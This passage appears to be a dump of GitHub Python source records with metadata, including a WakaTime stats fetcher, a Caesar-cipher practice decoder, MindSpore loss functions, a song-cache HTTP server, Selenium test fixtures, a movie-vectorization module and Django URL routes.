{ENCODED_API_KEY}'}\ndef get_daily_stats():\n    \n    params = {\n        # 'date': date\n    }\n    response = requests.get('https://wakatime.com/api/v1/users/current/status_bar/today', headers=headers, params=params)\n    \n    #print(response.status_code)\n    #print(response.json())\n    \n    if response.status_code == 200:\n        data = response.json()\n        if 'data' in data:\n            total_seconds = data['data']['grand_total']['total_seconds']\n            hours = total_seconds // 3600\n            minutes = (total_seconds % 3600) // 60\n            date = data['data']['range']['date']\n            print(f\"Total coding time on {date}: {hours} hours {minutes} minutes\")\n            \n            with open(f'coding_stats_{date}.json', 'w') as f:\n                json.dump(data, f)\n            print(f\"Data saved to coding_stats_{date}.json\")\n        else:\n            print(\"No coding data found 
for the given date.\")\n    else:\n        print(\"Failed to retrieve coding stats.\")\n\ndef get_all_stats():\n    params = {\n\n    }\n\n    response = requests.get('https://wakatime.com/api/v1/users/current/stats/last_year', headers=headers, params=params)\n    \n    if response.status_code == 200:\n        data = response.json()\n        if 'data' in data:\n            with open('coding_stats_all_.json', 'w') as f:\n                json.dump(data, f)\n            print(\"Data saved to coding_stats_all_.json\")\n        else:\n            print(\"No coding data found\")\n    else:\n        print(\"Failed to retrieve coding stats.\")\n\ntoday = datetime.date.today().strftime(\"%Y-%m-%d\")\n\nget_daily_stats()\nget_all_stats()\n","repo_name":"debasish-dutta/Wakatime-stats-log","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} {"seq_id":"25277463393","text":"import enchant \nfrom caesarcipher import CaesarCipher \n\nd = enchant.Dict(\"en_US\")\n\nwith open(\"caesar.enc\") as f: \n    enc = f.readline().rstrip()\n\n    flags = []\n\n    for i in range(1,26):\n        flag = CaesarCipher(enc,offset=i).decoded\n\n        score = 0 \n        for word in flag.split(): \n            if d.check(word):\n                score += 1 \n        flags.append((score,flag))\n\n    flags.sort(reverse=True)\n    for flag in flags:\n        print(f\"{flag[0]}: {flag[1]}\")\n    \n","repo_name":"Qdog31/C3T-Practice","sub_path":"Crypto_Practice/caesarcrack.py","file_name":"caesarcrack.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} {"seq_id":"35077450810","text":"import sys, argparse, os, shutil\nfrom uiplib.constants import CURR_DIR, PICS_FOLDER\nfrom uiplib.scheduler import scheduler\n\ndef main():\n    print(\"Hey, this is UIP! You can use it to download\"\n          \" images from reddit and also to schedule the setting of these\"\n          \" images as your desktop wallpaper.\")\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--offline\", action=\"store_true\",\n                        help=\"Runs UIP in offline mode.\")\n    parser.add_argument(\"--flush\", action=\"store_true\",\n                        help=\"Deletes all downloaded wallpapers\"\n                             \" and downloads new ones. 
\"\n                             \"When combined with --offline,\"\n                             \" deletes the wallpapers and exits.\")\n    args = parser.parse_args()\n    try:\n        if args.offline:\n            print(\"You have chosen to run UIP in offline mode.\")\n        if args.flush:\n            print(\"Deleting all downloaded wallpapers...\")\n            try:\n                shutil.rmtree(os.path.join(CURR_DIR, PICS_FOLDER))\n                os.mkdir(os.path.join(CURR_DIR, PICS_FOLDER))\n            except FileNotFoundError:\n                pass\n        if not args.offline:\n            print(\"UIP will now connect to internet and download images\"\n                  \" from reddit.\")\n        scheduler(args.offline)\n    except KeyboardInterrupt:\n        sys.exit(0)\n","repo_name":"teja-315/UIP","sub_path":"uiplib/UIP.py","file_name":"UIP.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} {"seq_id":"26703844025","text":"import mindspore.nn as nn\nimport mindspore.ops as P\nfrom mindspore.common import dtype as mstype\nfrom mindspore.nn.loss.loss import LossBase\n\nfrom src.utils.tools import ConfigS3DIS as cfg\n\n\nclass WeightCEloss(LossBase):\n    \"\"\"weight ce loss\"\"\"\n\n    def __init__(self, weights, num_classes):\n        super(WeightCEloss, self).__init__()\n        self.weights = weights\n        self.num_classes = num_classes\n        self.onehot = nn.OneHot(depth=num_classes)\n        self.ce = nn.SoftmaxCrossEntropyWithLogits(sparse=False)\n\n    def construct(self, logits, labels, valid_idx):\n        logits = logits.swapaxes(-2, -1).reshape((-1, self.num_classes))\n        one_hot_label = self.onehot(labels)  # [2b*n, 13]\n        weights = self.weights * one_hot_label  # [2b*n, 13]\n        weights = P.ReduceSum()(weights, 1)*valid_idx  # [2b*n]\n        logit = P.cast(logits, mstype.float32)\n        one_hot_label = P.cast(one_hot_label, mstype.float32)\n        unweighted_loss = self.ce(logit, one_hot_label)  # [2b*n]\n        weighted_loss = unweighted_loss * weights * valid_idx  # [2b*n]\n        cnt_valid = P.ReduceSum()(valid_idx.astype(mstype.float32))\n        CE_loss = P.ReduceSum()(weighted_loss) / cnt_valid  # [1]\n\n        return CE_loss\n\n\nclass JSLoss(LossBase):\n    \"\"\"Jensen-Shannon divergence\"\"\"\n\n    def __init__(self, b):\n        super(JSLoss, self).__init__()\n        self.b = b\n        self.softmax = nn.Softmax(axis=-1)\n        self.norm = nn.Norm(axis=-1, keep_dims=False)\n\n    def construct(self, logits):\n        logits = logits.swapaxes(-2, -1)\n        # logits = self.softmax(logits)\n        logits_clean = logits[:self.b, :, :].reshape(-1, logits.shape[-1])\n        logits_noise = logits[self.b:, :, :].reshape(-1, logits.shape[-1])\n        p1 = P.cast(logits_clean, mstype.float32)\n        p2 = P.cast(logits_noise, mstype.float32)\n        # q = 1/2*(p1+p2)\n        # loss_kl = p1 * P.Log()(p1/(q+1e-4)+1e-4) + p2 * P.Log()(p2/(q+1e-4)+1e-4)\n        loss_cos = (1-P.ReduceSum()(p1*p2, -1)/(self.norm(p1)*self.norm(p2)))*10\n\n        return P.ReduceMean(keep_dims=False)(loss_cos)\n\n\nclass CRLoss(LossBase):\n    \"\"\"CR loss\"\"\"\n\n    def __init__(self, num_classes):\n        super(CRLoss, self).__init__()\n        self.onehot = nn.OneHot(depth=num_classes)\n        self.relu = nn.ReLU()\n\n    def construct(self, rs1, rs2, labels):\n        label_pool_one_hot = self.onehot(labels)\n        Afinite_hot = P.matmul(label_pool_one_hot, P.Transpose()(label_pool_one_hot, (1, 0)))\n\n        rs_map_soft = P.matmul(rs1, P.Transpose()(rs2, (1, 0)))\n        rs_map_soft = self.relu(rs_map_soft)\n        rs_map_soft = P.clip_by_value(rs_map_soft, 1e-4, 1-(1e-4))\n        Afinite = Afinite_hot.reshape([-1, 1])\n        rs_map = rs_map_soft.reshape([-1, 1])\n        loss_cr = -1.0 * P.ReduceMean()(Afinite * P.Log()(rs_map) +\n                                        (1 - Afinite) * P.Log()(1 - rs_map))\n        A_R = P.ReduceSum()(Afinite_hot * rs_map_soft, 1)\n        loss_tjp = -1.0 * 
P.ReduceMean()(P.Log()(P.Div()(A_R, P.ReduceSum()(rs_map_soft, 1))))\n        loss_tjr = -1.0 * P.ReduceMean()(P.Log()(P.Div()(A_R, P.ReduceSum()(Afinite_hot, 1))))\n\n        return loss_cr + loss_tjp + loss_tjr\n\n\nclass PSDWithLoss(nn.Cell):\n    \"\"\"PSD-net with loss\"\"\"\n\n    def __init__(self, network, weights, num_classes, ignored_label_inds, is_training):\n        super(PSDWithLoss, self).__init__()\n        self.network = network\n        self.num_classes = num_classes\n        self.ignored_label_inds = ignored_label_inds\n        self.is_training = is_training\n        self.b = cfg.batch_size\n        self.ce_loss = WeightCEloss(weights, num_classes)\n        self.kl_loss = JSLoss(cfg.batch_size)\n        # self.cr_loss = CRLoss(num_classes)\n\n    def construct(self, feature, aug_feature, labels, input_inds, cloud_inds,\n                  p0, p1, p2, p3, p4, n0, n1, n2, n3, n4, pl0, pl1, pl2,\n                  pl3, pl4, u0, u1, u2, u3, u4):\n        # handle input\n        xyz = [p0, p1, p2, p3, p4]\n        neighbor_idx = [n0, n1, n2, n3, n4]\n        sub_idx = [pl0, pl1, pl2, pl3, pl4]\n        interp_idx = [u0, u1, u2, u3, u4]\n\n        # forward\n        logits, _, _ = self.network(\n            xyz, feature, aug_feature, neighbor_idx, sub_idx, interp_idx)\n\n        global_labels = P.Concat(0)([labels, labels])\n        global_labels = global_labels.reshape((-1,))  # [2b, n] --> [2b*n]\n        labels = labels.reshape((-1,))  # [b, n] --> [b*n]\n\n        # generate a valid-index mask to select valid logits and labels for the loss computation, due to the lack of such an operator in MindSpore.\n        # (B*N,)\n        ignore_mask = P.zeros_like(global_labels).astype(mstype.bool_)  # [b*n]\n        for ign_label in self.ignored_label_inds:\n            ignore_mask = P.logical_or(\n                ignore_mask, P.Equal()(global_labels, ign_label))\n\n        # Collect logits and labels that are not ignored\n        valid_idx = P.logical_not(ignore_mask).astype(mstype.int32)  # [b*n]\n\n        # compute loss\n        ce_loss = self.ce_loss(logits, global_labels, valid_idx)\n        kl_loss = self.kl_loss(logits)\n        # cr_loss = self.cr_loss(rs1, rs2, global_valid_labels)\n\n        loss = ce_loss + kl_loss  # + cr_loss\n\n        return loss\n\n\ndef get_param_groups(network):\n    \"\"\"Param groups for optimizer.\"\"\"\n    decay_params = []\n    no_decay_params = []\n    for x in network.trainable_params():\n        parameter_name = x.name\n        if parameter_name.endswith('.bias'):\n            # all bias not using weight decay\n            no_decay_params.append(x)\n        elif parameter_name.endswith('.gamma'):\n            # bn weight and bias not using weight decay; be careful: for now x does not include BN\n            no_decay_params.append(x)\n        elif parameter_name.endswith('.beta'):\n            # bn weight and bias not using weight decay; be careful: for now x does not include BN\n            no_decay_params.append(x)\n        else:\n            decay_params.append(x)\n\n    return [{'params': no_decay_params, 'weight_decay': 0.0}, {'params': decay_params}]\n","repo_name":"NotACracker/PSD_mindspore","sub_path":"src/model/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":6021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} {"seq_id":"71773164349","text":"import os\nimport json\nimport aiocron\nimport asyncio\nimport logging\nimport random as rand\nfrom dotenv import load_dotenv\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom util.web.cache import buildRandomCache, buildTopSongCache, buildTopSongTikTokCache\n\n#########################################################################################################\n# Global definitions\n\nlogging.basicConfig(format='%(levelname)s: %(asctime)s - %(name)s.%(funcName)s - %(message)s', level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\ntry:\n    load_dotenv()\n    HOSTNAME = 
os.getenv('WEB_SCRAPER_HOSTNAME')\n    PORT = os.getenv('WEB_SCRAPER_PORT')\nexcept Exception as ex:\n    logger.critical('Failed to retrieve environment variables. Please verify environment variable exists')\n    logger.critical(str(ex))\n    exit(1)\n\nRANDOM_SONG_CACHE = []\nTOP_SONG_US_CACHE = None\nTOP_SONG_GLOBAL_CACHE = None\nTOP_SONG_TIKTOK_CACHE = None\n\n#########################################################################################################\n# Server class\n\nclass Server(BaseHTTPRequestHandler):\n    def set_headers(self):\n        self.send_response(200)\n        self.send_header('Content-type', 'application/json')\n        self.end_headers()\n\n    def do_HEAD(self):\n        self.set_headers()\n\n    def do_GET(self):\n        logger.info(f'Received GET request - Path: {self.path}')\n        self.set_headers()\n\n        if '/get_random_song' == self.path:\n            randomIndex = rand.randint(0, len(RANDOM_SONG_CACHE) - 1)\n            randomSongIndex = rand.randint(0, len(RANDOM_SONG_CACHE[randomIndex]) - 1)\n            randomSong = RANDOM_SONG_CACHE[randomIndex][randomSongIndex]\n            response = json.dumps({'random': randomSong.__dict__})\n            self.wfile.write(response.encode('utf-8'))\n        elif '/get_top_song' == self.path:\n            response = json.dumps({'us': TOP_SONG_US_CACHE.__dict__, 'global': TOP_SONG_GLOBAL_CACHE.__dict__})\n            logger.info(f'Response: {response}')\n            self.wfile.write(response.encode('utf-8'))\n        elif '/get_tiktok_song' == self.path:\n            response = json.dumps({'tiktok': TOP_SONG_TIKTOK_CACHE.__dict__})\n            logger.info(f'Response: {response}')\n            self.wfile.write(response.encode('utf-8'))\n\n#########################################################################################################\n# Generates random song cache daily\n\n@aiocron.crontab('0 0 */1 * *')\nasync def randomSongCache():\n    global RANDOM_SONG_CACHE\n    RANDOM_SONG_CACHE = await buildRandomCache()\n\n#########################################################################################################\n# Generates top song caches hourly\n\n@aiocron.crontab('0 */1 * * *')\nasync def topSongCache():\n    global TOP_SONG_US_CACHE\n    global TOP_SONG_GLOBAL_CACHE\n    global TOP_SONG_TIKTOK_CACHE\n\n    try:\n        TOP_SONG_TIKTOK_CACHE = await buildTopSongTikTokCache()\n        TOP_SONG_US_CACHE = await buildTopSongCache('regional', 'us')\n        TOP_SONG_GLOBAL_CACHE = await buildTopSongCache('regional', 'global')\n    except Exception as ex:\n        logger.error('Unknown exception caught building cache at cron job')\n        logger.error(str(ex))\n\n#########################################################################################################\n# Builds random and top songs cache\n\nasync def buildSongCache():\n    global RANDOM_SONG_CACHE\n    global TOP_SONG_US_CACHE\n    global TOP_SONG_GLOBAL_CACHE\n    global TOP_SONG_TIKTOK_CACHE\n\n    try:\n        RANDOM_SONG_CACHE = await buildRandomCache()\n        TOP_SONG_TIKTOK_CACHE = await buildTopSongTikTokCache()\n        TOP_SONG_US_CACHE = await buildTopSongCache('regional', 'us')\n        TOP_SONG_GLOBAL_CACHE = await buildTopSongCache('regional', 'global')\n    except Exception as ex:\n        logger.error('Unknown exception caught building cache at startup')\n        logger.error(str(ex))\n\n#########################################################################################################\n# Server startup handler\n\nasync def run():\n    server = HTTPServer((HOSTNAME, int(PORT)), Server)\n    logger.info('Server is up and listening')\n    logger.info(f'Port: {PORT}')\n    await buildSongCache()\n\n    try:\n        server.serve_forever()\n    except KeyboardInterrupt:\n        pass\n\n    server.server_close()\n    logger.info('Server 
stopped')\n\n#########################################################################################################\n# Server startup\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n task = [loop.create_task(run())]\n loop.run_until_complete(asyncio.wait(task))\n loop.close()","repo_name":"beavelar/shuffle","sub_path":"web-scraper/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26703844025","text":"import time\n\n\nclass GameSerializer:\n def __init__(self, dir_name, buffer_size=1000):\n self.rows = []\n self.buffer_size = buffer_size\n self.file_name = \"../replays/\" + dir_name + \"/game.csv\"\n\n def write_header(self, field, traps, player_data):\n with open(self.file_name, \"a\") as f:\n f.write(str(field) + \"\\n\")\n f.write(str(traps) + \"\\n\")\n f.write(str(player_data) + \"\\n\")\n\n def add_events(self, events):\n t = time.time()\n self.rows.append((t, [x.encode() for x in events]))\n if len(self.rows) > self.buffer_size:\n with open(self.file_name, \"a\") as f:\n for row in self.rows:\n f.write(\";\".join([str(x) for x in row]) + \"\\n\" )\n self.rows = []\n","repo_name":"LanyK/TheAngerGames","sub_path":"bombangerman/server/GameSerializer.py","file_name":"GameSerializer.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"32237771252","text":"from selenium import webdriver\nimport pytest\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.firefox import GeckoDriverManager\nfrom webdriver_manager.microsoft import EdgeChromiumDriverManager\n\n\n@pytest.fixture(scope='class')\ndef init_chromedriver(request):\n chrome_driver = webdriver.Chrome(ChromeDriverManager().install())\n request.cls.driver = chrome_driver\n yield\n chrome_driver.quit()\n\n\n@pytest.fixture(scope='class')\ndef init_geckodriver(request):\n gecko_driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())\n request.cls.driver = gecko_driver\n yield\n gecko_driver.quit()\n\n\n@pytest.fixture(scope='class')\ndef init_edgedriver(request):\n edge_driver = webdriver.Edge(executable_path=EdgeChromiumDriverManager().install())\n request.cls.driver = edge_driver\n yield\n edge_driver.quit()\n\n\n@pytest.mark.usefixtures(\"init_geckodriver\")\nclass Test_Parent:\n pass\n\n\nclass Test_Child(Test_Parent):\n\n def test_get_title(self):\n self.driver.get(\"http://www.google.com/\")\n assert self.driver.title == \"Google\"\n\n def test_get_url(self):\n assert self.driver.current_url == \"https://www.google.com/?gws_rd=ssl\"","repo_name":"arnab07das/Selenium-Python-Sessions","sub_path":"PytestSessions/test_fixtures_class.py","file_name":"test_fixtures_class.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"2429310858","text":"from __future__ import division\r\nimport re\r\nimport math\r\nimport operator\r\nimport collections\r\nimport ujson\r\nfrom stemming import porter2\r\nfrom collections import Counter\r\n\r\ndef tokenize(text):\r\n tokens = re.findall(\"[\\w']+\", text.lower())\r\n return [porter2.stem(token) for token in tokens]\r\n\r\ndef read_movies(filename):\r\n file = open(filename)\r\n for line in file:\r\n yield ujson.loads(line)\r\n file.close()\r\n\r\nclass vector(object):\r\n\r\n def __init__(self):\r\n 
self.movie_vectors = dict()\r\n self.total = 0\r\n\r\n def vectorize_plot(self,movie):\r\n \"\"\"\r\n purpose: read the movie and turn it into a vector of\r\n plot phrases\r\n parameters:\r\n movies - a dictionary of a movie\r\n returns: none\r\n \"\"\"\r\n \r\n if 'plot_simple' in movie:\r\n plot = tokenize(movie['plot_simple'])\r\n rating = movie['rating']\r\n ratingcount = movie['rating_count']\r\n plot_vector = dict()\r\n count = 0\r\n for word in plot:\r\n plot_vector[word] = len(word)/(((rating)*math.log(ratingcount,10))/math.log(self.total,15))\r\n count += 1\r\n\r\n return plot_vector\r\n else:\r\n return {}\r\n\r\n def vectorize_actor(self,movie):\r\n \"\"\"\r\n purpose: read the movie and turn it into a vector of\r\n actors\r\n parameters:\r\n movies - a dictionary of a movie\r\n returns: none\r\n \"\"\"\r\n\r\n if 'actors' in movie:\r\n actors = movie['actors']\r\n ratingcount = movie['rating_count']\r\n rating = movie['rating']\r\n actor_vector = dict()\r\n count = 0\r\n for actor in actors:\r\n alpha = math.exp(-ratingcount)\r\n actor_vector[actor] = ((rating)*math.log(ratingcount,10))/math.log(self.total,15)\r\n count += 1\r\n\r\n return actor_vector\r\n else:\r\n return {}\r\n\r\n def vectorize_writer(self,movie):\r\n \"\"\"\r\n purpose: read the movie and turn it into a vector of\r\n writers\r\n parameters:\r\n movies - a dictionary of a movie\r\n returns: none\r\n \"\"\"\r\n \r\n if 'writers' in movie:\r\n writers = movie['writers']\r\n rating = movie['rating']\r\n ratingcount = movie['rating_count']\r\n writers_vector = dict()\r\n count = 0\r\n for writer in writers:\r\n writers_vector[writer] = ((rating)*math.log(ratingcount,10))/math.log(self.total,15)\r\n count += 1\r\n\r\n return writers_vector\r\n else:\r\n return {}\r\n\r\n def vectorize_director(self,movie):\r\n \"\"\"\r\n purpose: read the movie and turn it into a vector of\r\n directors\r\n parameters:\r\n movie - a dictionary of a movie\r\n returns: none\r\n \"\"\"\r\n \r\n if 'directors' in movie:\r\n directors = movie['directors']\r\n ratingcount = movie['rating_count']\r\n rating = movie['rating']\r\n directors_vector = dict()\r\n count = 0\r\n for director in directors:\r\n directors_vector[director] = ((rating)*math.log(ratingcount,10))/math.log(self.total,15)\r\n count += 1\r\n \r\n return directors_vector\r\n else:\r\n return {}\r\n def vectorize_genre(self,movie):\r\n \"\"\"\r\n purpose: read the movie and turn it into a vector of\r\n directors\r\n parameters:\r\n movie - a dictionary of a movie\r\n returns: none\r\n \"\"\"\r\n \r\n if 'genres' in movie:\r\n genres = movie['genres']\r\n rating = movie['rating']\r\n genre_vector = dict()\r\n ratingcount = movie['rating_count']\r\n count = 0\r\n for genre in genres:\r\n genre_vector[genre] = ((rating)*math.log(ratingcount,10))/math.log(self.total,15)\r\n count += 1\r\n \r\n return genre_vector\r\n else:\r\n return {}\r\n\r\n\r\n def vectorize(self,movies,collection,collection_name):\r\n\r\n \"\"\"\r\n purpose: read the movies and turn them into vectors of\r\n actors, writers, directors, and plot\r\n parameters:\r\n movies - an iterator of movie dictionaries\r\n returns: none\r\n \"\"\"\r\n movie_vectors = {}\r\n ratingmax = 0\r\n\r\n tempmovies = read_movies('mv.json')\r\n \r\n for movie in tempmovies:\r\n if 'rating_count' in movie:\r\n if movie['rating_count'] > ratingmax:\r\n ratingmax = movie['rating_count']\r\n\r\n self.total = ratingmax\r\n \r\n for movie in movies:\r\n if 'imdb_id' and 'rating_count' in movie:\r\n movie_id = movie['imdb_id']\r\n 
movie_rating = -1.0\r\n if 'rating' in movie:\r\n movie_rating = movie['rating']\r\n \r\n movie_dict = {}\r\n movie_dict['title'] = movie['title']\r\n movie_dict['actors'] = self.vectorize_actor(movie)\r\n movie_dict['writers'] = self.vectorize_writer(movie)\r\n movie_dict['directors'] = self.vectorize_director(movie)\r\n movie_dict['plot'] = self.vectorize_plot(movie)\r\n movie_dict['genres'] = self.vectorize_genre(movie)\r\n ratingcount = movie['rating_count']\r\n movie_dict['rating'] = movie['rating']\r\n #print \r\n #print \"OLD: \", movie_rating\r\n #movie_dict['rating'] = ((movie_rating)*math.log(ratingcount,10))/math.log(self.total,15)\r\n #print \"RATINGC\", ratingcount\r\n #print \"NEW: \" , movie_dict['rating']\r\n #print\r\n movie_dict['rating_count'] = movie['rating_count'] \r\n \r\n #movie_dict['plot'] = self.vectorize_plot(movie)\r\n \r\n movie_vectors[movie_id] = movie_dict\r\n if collection_name == 'training':\r\n d = dict(\r\n info = movie,\r\n imdb_id = movie_id\r\n )\r\n collection.insert(d)\r\n\r\n return movie_vectors\r\n\r\n\r\n\r\n","repo_name":"perozol/termahterPicker","sub_path":"vectorization.py","file_name":"vectorization.py","file_ext":"py","file_size_in_byte":6509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31627759906","text":"from django.conf.urls import url, include\nfrom EmployeeApp import views\n\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nfrom rest_framework import routers\n\nfrom rest_framework_simplejwt.views import TokenObtainPairView, TokenRefreshView, TokenVerifyView\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', views.UserViewSet)\n\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n url(r'^api-auth/', include('rest_framework.urls')),\n url(r'^login/', TokenObtainPairView.as_view(), name='token_obtain_pair'),\n url(r'^token/refresh', TokenRefreshView.as_view(), name='token_refresh'),\n url(r'^token/verify/', TokenVerifyView.as_view(), name='token_verify'),\n\n url(r'^department/$', views.departmentApi),\n url(r'^department/([0-9]+)$', views.departmentApi),\n\n url(r'^employee/$', views.employeeApi),\n url(r'^employee/([0-9]+)$', views.employeeApi),\n\n url(r'^basicInformations/publish/$', views.publish_basic_information),\n url(r'^basicInformations/$', views.basicInformationApi),\n url(r'^basicInformations/([0-9]+)$', views.basicInformationApi),\n\n # url(r'^departmentInformations/publish/$', views.publish_department_information),\n url(r'^subdivisions/$', views.subdivisions),\n url(r'^subdivisions/format/$', views.subdivisionsFormat),\n url(r'^subdivisions/([1-9][0-9]*)$', views.subdivisions_by_id),\n url(r'^subdivisions/publish/$', views.subdivisions_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^basic_informations/$', views.basic_informations),\n url(r'^basic_informations/format/$', views.basic_informationsFormat),\n url(r'^basic_informations/([1-9][0-9]*)$', views.basic_informations_by_id),\n url(r'^basic_informations/publish/$', views.basic_informations_publish),\n\n url(r'^founders/$', views.founders),\n url(r'^founders/format/$', views.foundersFormat),\n url(r'^founders/([1-9][0-9]*)$', views.founders_by_id),\n url(r'^founders/publish/$', views.founders_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^filiations/$', views.filiations),\n url(r'^filiations/format/$', 
views.filiationsFormat),\n url(r'^filiations/([1-9][0-9]*)$', views.filiations_by_id),\n url(r'^filiations/publish/$', views.filiations_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^representations/$', views.representations),\n url(r'^representations/format/$', views.representationsFormat),\n url(r'^representations/([1-9][0-9]*)$', views.representations_by_id),\n url(r'^representations/publish/$', views.representations_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^managements/$', views.managements),\n url(r'^managements/format/$', views.managementsFormat),\n url(r'^managements/([1-9][0-9]*)$', views.managements_by_id),\n url(r'^managements/publish/$', views.managements_publish),\n\n url(r'^volumes/$', views.volumes),\n url(r'^volumes/format/$', views.volumesFormat),\n url(r'^volumes/([1-9][0-9]*)$', views.volumes_by_id),\n url(r'^volumes/publish/$', views.volumes_publish),\n\n url(r'^rushs/$', views.rushs),\n url(r'^rushs/format/$', views.rushsFormat),\n url(r'^rushs/([1-9][0-9]*)$', views.rushs_by_id),\n url(r'^rushs/publish/$', views.rushs_publish),\n\n url(r'^vacs/$', views.vacs),\n url(r'^vacs/format/$', views.vacsFormat),\n url(r'^vacs/([1-9][0-9]*)$', views.vacs_by_id),\n url(r'^vacs/publish/$', views.vacs_publish),\n # ---------------------------------------------------------\n url(r'^leaders/$', views.leaders),\n url(r'^leaders/format/$', views.leadersFormat),\n url(r'^leaders/([1-9][0-9]*)$', views.leaders_by_id),\n url(r'^leaders/publish/$', views.leaders_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^leadersTwo/$', views.leadersTwos),\n url(r'^leadersTwo/format/$', views.leadersTwosFormat),\n url(r'^leadersTwo/([1-9][0-9]*)$', views.leadersTwos_by_id),\n url(r'^leadersTwo/publish/$', views.leadersTwos_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^filialLeaders/$', views.filialLeaders),\n url(r'^filialLeaders/format/$', views.filialLeadersFormat),\n url(r'^filialLeaders/([1-9][0-9]*)$', views.filialLeaders_by_id),\n url(r'^filialLeaders/publish/$', views.filialLeaders_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^teachers/$', views.teachers),\n url(r'^teachers/format/$', views.teachersFormat),\n url(r'^teachers/([1-9][0-9]*)$', views.teachers_by_id),\n url(r'^teachers/publish/$', views.teachers_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^standartCopies/$', views.standartCopies),\n url(r'^standartCopies/format/$', views.standartCopiesFormat),\n url(r'^standartCopies/([1-9][0-9]*)$', views.standartCopies_by_id),\n url(r'^standartCopies/publish/$', views.standartCopies_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^standartCopiestwos/$', views.standartCopiestwos),\n url(r'^standartCopiestwos/format/$', views.standartCopiestwosFormat),\n url(r'^standartCopiestwos/([1-9][0-9]*)$', views.standartCopiestwos_by_id),\n url(r'^standartCopiestwos/publish/$', views.standartCopiestwos_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^paidServices/$', views.paidServices),\n url(r'^paidServices/format/$', views.paidServicesFormat),\n 
url(r'^paidServices/([1-9][0-9]*)$', views.paidServices_by_id),\n url(r'^paidServices/publish/$', views.paidServices_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^plats/$', views.plats),\n url(r'^plats/format/$', views.platsFormat),\n url(r'^plats/([1-9][0-9]*)$', views.plats_by_id),\n url(r'^plats/publish/$', views.plats_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docas/$', views.docas),\n url(r'^docas/format/$', views.docasFormat),\n url(r'^docas/([1-9][0-9]*)$', views.docas_by_id),\n url(r'^docas/publish/$', views.docas_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docbs/$', views.docbs),\n url(r'^docbs/format/$', views.docbsFormat),\n url(r'^docbs/([1-9][0-9]*)$', views.docbs_by_id),\n url(r'^docbs/publish/$', views.docbs_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^doccs/$', views.doccs),\n url(r'^doccs/format/$', views.doccsFormat),\n url(r'^doccs/([1-9][0-9]*)$', views.doccs_by_id),\n url(r'^doccs/publish/$', views.doccs_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docds/$', views.docds),\n url(r'^docds/format/$', views.docdsFormat),\n url(r'^docds/([1-9][0-9]*)$', views.docds_by_id),\n url(r'^docds/publish/$', views.docds_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^doces/$', views.doces),\n url(r'^doces/format/$', views.docesFormat),\n url(r'^doces/([1-9][0-9]*)$', views.doces_by_id),\n url(r'^doces/publish/$', views.doces_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docfs/$', views.docfs),\n url(r'^docfs/format/$', views.docfsFormat),\n url(r'^docfs/([1-9][0-9]*)$', views.docfs_by_id),\n url(r'^docfs/publish/$', views.docfs_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^docgs/$', views.docgs),\n url(r'^docgs/format/$', views.docgsFormat),\n url(r'^docgs/([1-9][0-9]*)$', views.docgs_by_id),\n url(r'^docgs/publish/$', views.docgs_publish),\n url(r'^upload-file/$', views.handle_file),\n url(r'^download-file/(.*)$', views.handle_file),\n\n url(r'^dochs/$', views.dochs),\n 